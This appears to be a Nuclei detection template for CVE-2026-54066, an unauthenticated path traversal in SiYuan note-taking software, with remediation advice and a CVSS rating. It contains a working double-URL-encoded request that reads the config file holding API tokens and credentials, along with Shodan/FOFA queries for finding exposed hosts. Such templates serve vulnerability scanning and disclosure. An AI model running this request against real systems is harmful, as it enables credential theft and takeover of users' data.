id: CVE-2026-54066 info: name: SiYuan <= 3.6.5 - Unauthenticated Path Traversal author: 0x_Akoko severity: high description: | SiYuan <= 3.6.5 contains a path traversal via double URL-encoding in the /assets/ route (publish mode port 6808), allowing unauthenticated attackers to read arbitrary files inside WorkspaceDir including conf/conf.json which exposes the API token and access auth code. impact: | Unauthenticated attackers can read conf/conf.json exposing the API token, accessAuthCode SHA256 hash, and sync credentials, enabling full authenticated API access to all notebooks. remediation: | Update to SiYuan v3.7.0 or later. reference: - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-p4m3-mgmm-c664 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2026-54066 epss-score: 0.01892 epss-percentile: 0.77411 cwe-id: CWE-22 metadata: verified: false max-request: 1 vendor: siyuan-note product: siyuan shodan-query: port:6808 "SiYuan" fofa-query: title="SiYuan" && port="6808" tags: cve,cve2026,siyuan,path-traversal,lfi,unauth,publish-mode,disclosure http: - raw: - | GET /assets/%252e%252e/%252e%252e/conf/conf.json HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "application/json")' - 'contains_all(body, "accessAuthCode", "appearance", "editor", "system")' condition: and # digest: 4a0a00473045022100dd7f01bd65439ff444fcaa6a8b678c12cbdde6e15183717cfe3f446c12d549de02202b1c7c4f8ec7073d634704e98e4aababebd80ad7a29c0b7296181987a10b6fe8:922c64590222798bb761d5b6d8e72950